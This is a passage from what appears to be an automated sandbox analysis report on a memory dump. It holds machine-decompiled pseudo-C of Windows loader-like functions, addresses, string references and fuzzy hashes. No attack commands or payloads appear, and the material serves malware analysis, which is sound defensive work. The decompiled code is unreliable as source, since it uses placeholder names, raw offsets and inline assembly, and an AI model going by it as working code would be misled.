						E01BFA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E01BFA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1c28b04 >> 0x14) + (_v44 -  *0x1c28b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01B57D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E01BF138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01B57D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E01BEFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1c28724 & 0x00000008) != 0) {
						E01BF52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E01C015B5(0x1c28ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x01c00eb7
0x01c00eb9
0x01c00ec0
0x01c00ec2
0x01c00ecd
0x01c0105b
0x01c0105b
0x01c01061
0x01c01066
0x01c01066
0x01c0106b
0x01c01073
0x01c01073
0x01c00ed3
0x01c00ed6
0x01c00edc
0x01c00ee0
0x01c00ee7
0x01c00ef0
0x01c00ef5
0x01c00efa
0x01c00efc
0x01c00efd
0x01c00f03
0x01c00f04
0x01c00f06
0x01c00f07
0x01c00f09
0x01c00f0e
0x01c00f14
0x01c00f23
0x01c00f2d
0x01c00f34
0x01c00f34
0x01c00f14
0x01c00f52
0x00000000
0x00000000
0x01c00f58
0x01c00f73
0x01c00f74
0x01c00f79
0x01c00f7d
0x01c00f80
0x01c00f86
0x01c00fab
0x01c00fb5
0x01c00fc6
0x01c00fd1
0x01c00fe3
0x01c00fd3
0x01c00fdc
0x01c00fdc
0x01c00feb
0x01c01009
0x01c01009
0x01c01015
0x01c01027
0x01c01017
0x01c01020
0x01c01020
0x01c0102f
0x01c0103c
0x01c0103c
0x01c01048
0x01c01050
0x01c01050
0x01c01055
0x00000000
0x01c01055
0x01c00f88
0x01c00f9e
0x01c00fa2
0x01c00fa9
0x00000000
0x00000000
0x00000000
0x01c00fa9
0x00000000

Strings

`, xrefs: 01C00F16

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: a8870863dfc5945ebd38019a1d89b2f28a8bf0323f46fe989e210a77b96de119
Instruction ID: af8bcaeeaf9a6ce9a4d0f9b3cc081b64061d25a68fe04657fa56f209f56521c6
Opcode Fuzzy Hash: a8870863dfc5945ebd38019a1d89b2f28a8bf0323f46fe989e210a77b96de119
Instruction Fuzzy Hash: FB519D71304382DFD726DF28D884B2BBBE5EB84754F08096CFA9697290DB70E905C762

Uniqueness

Uniqueness Score: -1.00%

Function 01B6F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01B6F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01B54120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01B79830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01B79990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E01B795D0();
							goto L11;
						} else {
							_t109 = L01B54620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E01B7F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E01B795D0();
										L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x01b6f0d3
0x01b6f0d9
0x01b6f0e0
0x01b6f0e7
0x01b6f0f2
0x01b6f0f4
0x01b6f0f8
0x01b6f100
0x01b6f108
0x01b6f10d
0x01b6f115
0x01b6f116
0x01b6f11f
0x01b6f123
0x01b6f124
0x01b6f12c
0x01b6f130
0x01b6f134
0x01b6f13d
0x01b6f144
0x01b6f14b
0x01b6f152
0x01babab0
0x01babab0
0x01b6f158
0x01b6f158
0x01b6f15a
0x01b6f160
0x01b6f165
0x01b6f166
0x01b6f16f
0x01b6f173
0x01babaa7
0x01babaa7
0x01babaab
0x00000000
0x01b6f179
0x01b6f18d
0x01b6f191
0x01babaa2
0x00000000
0x01b6f197
0x01b6f19b
0x01b6f1a2
0x01b6f1a9
0x01b6f1af
0x01b6f1b2
0x01b6f1b6
0x01b6f1b9
0x01b6f1c4
0x01b6f1d8
0x01b6f1df
0x01b6f1e3
0x01b6f1eb
0x01b6f1ee
0x01b6f1f4
0x01b6f20f
0x01babab7
0x01bababb
0x01babacc
0x01babad1
0x01b6f215
0x01b6f218
0x01b6f226
0x01b6f22b
0x00000000
0x01b6f22b
0x01b6f1f6
0x01b6f1f6
0x01b6f1f9
0x01b6f1fb
0x01b6f1fb
0x01b6f1f4
0x01b6f191
0x01b6f173
0x01b6f152
0x01b6f203

Strings

@, xrefs: 01B6F124

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: d9738bb4d2c91ac07a245b561bb71464c1ef5c64efc4cd3928a91cff55ad2451
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 3351AE712047119FC724DF29C840A6BBBF8FF58750F008A6DFAA587690E7B4E904CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01BB3540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01BB3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x1c2d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01B70BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01BB3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E01B7FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01BB3540;
						E01B7FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E01B8DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01BC0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E01B797C0();
					}
					return E01B7B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01BB3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01BB3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E01B7FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01B79650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01BB3787(_a4,  &_v352, _t80);
						}
					}
					L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E01B795D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01bb3552
0x01bb355a
0x01bb355d
0x01bb3566
0x01bb3567
0x01bb357e
0x01bb358f
0x01bb35a1
0x01bb35a5
0x01bb366b
0x01bb366b
0x01bb366d
0x01bb3672
0x01bb3679
0x01bb3685
0x01bb368d
0x01bb369d
0x01bb36a7
0x01bb36b8
0x01bb36c6
0x01bb36c7
0x01bb36dc
0x01bb36e1
0x01bb36e7
0x01bb36e9
0x01bb36e9
0x01bb3703
0x01bb3703
0x01bb35b5
0x01bb35c0
0x01bb35c4
0x00000000
0x00000000
0x01bb35ca
0x01bb35d7
0x01bb35e2
0x01bb35e6
0x01bb35e8
0x01bb35f5
0x01bb35fa
0x01bb3603
0x01bb3604
0x01bb3609
0x01bb360a
0x01bb3612
0x01bb3613
0x01bb361e
0x01bb3622
0x01bb3628
0x01bb362f
0x01bb362f
0x01bb3636
0x01bb3638
0x01bb363b
0x01bb3642
0x01bb3642
0x01bb3636
0x01bb3657
0x01bb3657
0x01bb365c
0x01bb3662
0x01bb3669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 01BB358F

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 7c0525071c4546cc678110933fa272a66583eede1c108b3527f172a7e295d137
Instruction ID: d42be55e7d78c15c75f5f6bd52c2d47a501079d87a3297d3126d859e1ee119ec
Opcode Fuzzy Hash: 7c0525071c4546cc678110933fa272a66583eede1c108b3527f172a7e295d137
Instruction Fuzzy Hash: 5F4154B2D0052DABDF25DA90DC80FEEB77CAB54714F0045E5EA19AB250DB709E88CF94

Uniqueness

Uniqueness Score: -1.00%

Function 01C005AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E01C005AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E01C007DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01B79730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E01BFA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E01BFA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01C01293(_t79, _v40, E01C007DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01B57D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E01BF138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x01c005c5
0x01c005ca
0x01c005d3
0x01c006db
0x01c006db
0x01c006dd
0x01c006e3
0x01c006e3
0x01c005dd
0x01c005e7
0x01c005f6
0x01c00600
0x01c00607
0x01c00610
0x01c00615
0x01c0061a
0x01c0061c
0x01c0061e
0x01c00624
0x01c00625
0x01c00627
0x01c00628
0x01c00631
0x01c00640
0x01c0064d
0x01c00654
0x01c00654
0x01c00631
0x01c0066d
0x01c00674
0x00000000
0x00000000
0x01c00692
0x01c0069e
0x01c006b0
0x01c006a0
0x01c006a9
0x01c006a9
0x01c006b8
0x01c006d6
0x01c006d6
0x00000000

Strings

`, xrefs: 01C00633

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: d5d9ce28f14ecc0733d11b458027f1c24e46d2780df520f92d0069bceaf38fcd
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: BC31F532700346ABEB11DE28CC45F9B7BDAEB84794F154129FE599B2C0D770E914CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01BB3884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01BB3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01B79650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01B54620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01B79650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01bb3893
0x01bb3896
0x01bb3899
0x01bb389f
0x01bb38a0
0x01bb38a4
0x01bb38a9
0x01bb38ac
0x01bb38ad
0x01bb38ae
0x01bb38af
0x01bb38b1
0x01bb38b4
0x01bb38bb
0x01bb38bc
0x01bb38bd
0x01bb38c4
0x01bb38c8
0x01bb38ca
0x01bb38ca
0x01bb38d5
0x01bb393e
0x01bb3940
0x01bb3942
0x01bb3952
0x01bb3954
0x01bb3961
0x01bb3961
0x01bb3967
0x01bb396e
0x01bb396e
0x01bb3947
0x01bb394c
0x00000000
0x01bb394c
0x01bb38ea
0x01bb38ee
0x01bb38f8
0x01bb38f9
0x01bb38ff
0x01bb3900
0x01bb3902
0x01bb3903
0x01bb390b
0x01bb390f
0x01bb3950
0x00000000
0x01bb3950
0x01bb3915
0x01bb391d
0x01bb391d
0x01bb3922
0x01bb3926
0x00000000
0x01bb3928
0x01bb392b
0x01bb392b
0x01bb3935
0x01bb3937
0x01bb3937
0x00000000
0x01bb3935
0x01bb3926
0x01bb38f0
0x00000000

Strings

BinaryName, xrefs: 01BB38B4

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: fb3ff3310109b133019b3ef8ddcbe7df9b70a163e7855d7e0cf995c2dd222401
Instruction ID: eefd73fe2acbeeb9a9d68210b9ce77a7c24a45b073fc37fe4ac91bba74de5b99
Opcode Fuzzy Hash: fb3ff3310109b133019b3ef8ddcbe7df9b70a163e7855d7e0cf995c2dd222401
Instruction Fuzzy Hash: 7231E83290051ABFEF19DB58C985EBBBBB4FB40720F0141A9E956A7660D770DE40C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01B6D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E01B6D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x1c2d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01B54120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E01B7B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E01B798D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E01B795D0();
					L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x01b6d29c
0x01b6d2a6
0x01b6d2b1
0x01b6d2b5
0x01b6d2b6
0x01b6d2bc
0x01b6d2bd
0x01b6d2be
0x01b6d2bf
0x01b6d2c2
0x01b6d2c4
0x01b6d2cc
0x01b6d384
0x01b6d34b
0x01b6d34f
0x01b6d350
0x01b6d351
0x01b6d35c
0x01b6d35c
0x01b6d2d6
0x01b6d2da
0x01b6d2e1
0x01b6d361
0x01b6d369
0x01b6d36d
0x01b6d2e3
0x01b6d2e3
0x01b6d2e3
0x01b6d2e5
0x01b6d2ed
0x01b6d2f5
0x01b6d2fa
0x01b6d302
0x01b6d303
0x01b6d30b
0x01b6d30f
0x01b6d313
0x01b6d318
0x01b6d31c
0x01b6d320
0x01b6d379
0x01b6d37d
0x00000000
0x00000000
0x01baaffe
0x01bab001
0x01bab011
0x00000000
0x01b6d322
0x01b6d322
0x01b6d330
0x01b6d337
0x01b6d35d
0x01b6d339
0x01b6d33f
0x01b6d38c
0x01b6d38c
0x01b6d33f
0x01b6d349
0x00000000
0x01b6d349

Strings

@, xrefs: 01B6D303

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: a859e34314630b83e33e89769a569286ed0215c59b63bc21d3e526edf66ecdee
Instruction ID: 6085b9d7a03eb13f91364bf1b643024cb06962de252f6953f7963ae54bf3af81
Opcode Fuzzy Hash: a859e34314630b83e33e89769a569286ed0215c59b63bc21d3e526edf66ecdee
Instruction Fuzzy Hash: D331A1B26083059FC725DF68C980A6BBBECEBA5654F000A6EF9D583210D738DD04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01B41B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01B41B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E01B7BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E01B7A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E01B7A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01B54620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x01b41b8f
0x01b41b9a
0x01b41b9c
0x01b41b9e
0x01b41ba3
0x01b97010
0x01b97010
0x00000000
0x01b41ba9
0x01b41ba9
0x01b41bae
0x00000000
0x01b41bc5
0x01b41bca
0x01b41bcf
0x01b41bd0
0x01b41bd1
0x01b41bd2
0x01b41bd6
0x01b41bdc
0x01b41be0
0x01b96ffc
0x01b97000
0x00000000
0x01b97006
0x01b97009
0x01b97009
0x01b41be6
0x01b41bec
0x01b41c0b
0x01b41c0b
0x01b41c0c
0x01b41c11
0x01b41c12
0x01b41c15
0x01b41c1b
0x01b41c1f
0x01b41c31
0x01b41c33
0x01b97026
0x01b97026
0x01b41c21
0x01b41c24
0x01b41c24
0x01b41bee
0x01b41bee
0x01b41bf2
0x01b41c3a
0x01b41bf4
0x01b41bf4
0x01b41c05
0x01b41c05
0x01b41c09
0x01b41c3e
0x00000000
0x00000000
0x00000000
0x01b41c09
0x01b41bec
0x01b41be0
0x01b41bae
0x01b41c2e

Strings

WindowsExcludedProcs, xrefs: 01B41BC5

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 06cc3033bcd6ebe31017e67a835a60c308e44ddb434ea52331af1c96e5bf2c24
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 7721D636D04119ABDF2A9A5DCC40F5B7BADEB44650F0585E5FE048F201DB30E851ABA5

Uniqueness

Uniqueness Score: -1.00%

Function 01B5F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01B5F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x01b5f71d
0x01b5f722
0x01b5f726
0x01ba4770
0x01b5f765
0x01b5f769
0x01b5f769
0x01b5f732
0x01ba477a
0x00000000
0x01ba477a
0x01b5f738
0x01b5f73a
0x01b5f73c
0x01b5f73f
0x01b5f746
